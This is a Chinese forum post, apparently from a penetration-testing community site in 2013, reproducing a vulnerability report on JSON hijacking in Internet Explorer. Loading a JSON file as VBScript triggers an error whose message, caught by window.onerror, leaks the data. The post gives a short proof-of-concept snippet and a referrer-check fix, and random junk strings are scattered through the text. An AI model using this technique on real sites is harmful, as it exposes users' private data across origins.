中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
' T8 ?. P* [% ~/ [
" u& N% M& F5 x X4 G* z! ^
由于某些资源容器对数据处理不当导致json劫持漏洞.
% y' v. z! E5 u5 v% j
详细说明:
# F( @' k* J: y3 ~0 r- V
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
* g, J- I5 ^! W8 f7 `- s
<script language=vbscript></script>
4 q) H8 o" C; Q% {7 b- D7 Q
/ J* H$ ]# w5 `$ ?
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
/ z' e+ Y. Q/ W4 _% i
漏洞证明:
& \& j" p E$ J
<script>
. D" s3 Z! A5 w2 N
window.onerror=function(_){
2 G T1 e# N+ _* S
alert(_)
?3 ]2 j! C) F, \" E1 q( ^0 P. h
}
* @& [; |2 F1 e# n# u
</script>
l" m3 N3 O* u/ Q
<script language=vbscript src=1.json></script>
; E6 Q# b4 N2 s! n
: ^- J: f9 O) \2 {
- `! p$ W( O, z7 @- X6 \
1.json:
6 |; Q) h3 n& M& G9 l: H" J8 Y
[{"name":"sogili","age":19}]
( l K; i. \0 Z5 W
修复方案:
4 f1 S' {; V, f
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2